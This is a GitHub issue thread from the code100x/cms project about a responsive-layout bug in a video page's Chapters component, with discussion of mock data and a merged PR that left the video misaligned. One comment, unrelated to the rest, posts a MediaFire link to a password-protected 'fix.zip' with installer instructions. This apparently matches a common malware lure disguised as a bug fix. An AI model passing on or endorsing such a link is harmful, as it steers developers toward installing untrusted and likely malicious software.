### ISSUE TITLE
bug: Chapter's component became unresponsive with the new UI changes

### ISSUE THREAD

**Issue by IAmRiteshKoushik** [code100x/cms#1034]
**Describe the bug**
![image](https://github.com/user-attachments/assets/925a7b25-6e16-4196-8229-e536cc61f51a)

**To Reproduce**
Split the screen to half size and the bug is visible. 

**Expected behavior**
Previously the chapters' component would go down but now it competes for space.

**Info:**
 - Browser : Firefox (PC)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IAmRiteshKoushik** [comment]
@devsargam Can I have this assigned so that I can start working on a fix for the same ?

**Comment by IAmRiteshKoushik** [comment]
@devsargam @siinghd @hkirat - In-order to solve this issue, we would need a test-component where there is a the `Chapters` component data. Currently for the test-video added there is no chapters' component. Request further assistance with this.

**Comment by hkirat** [comment]
Hard code some chapters on the frontend for testing

**Comment by devsargam** [comment]
Just see the props and make a mock obj

**Comment by zenithexe** [comment]
@IAmRiteshKoushik I didn't see this issue before. I already made a PR ( #1049) regarding the same issue #1033. Sorry, if you were working on it.

**Comment by IAmRiteshKoushik** [comment]
@zenithexe It's alright. I had not completed my work yet. Good for you. Hope your PR gets merged.

**Comment by hkirat** [comment]
Merged https://github.com/code100x/cms/pull/1049 but it makes the video left aligned when chapters are turned off
![Screenshot 2024-08-27 at 10 42 05 AM](https://github.com/user-attachments/assets/56d77220-796a-4398-b75d-b080b66a7c27)

It should be centrally aligned

cc @zenithexe

**Comment by zenithexe** [comment]
@hkirat sorry for that, I will fix it right now.

**Comment by ramnaresh8** [comment]
chapters component isn't live now
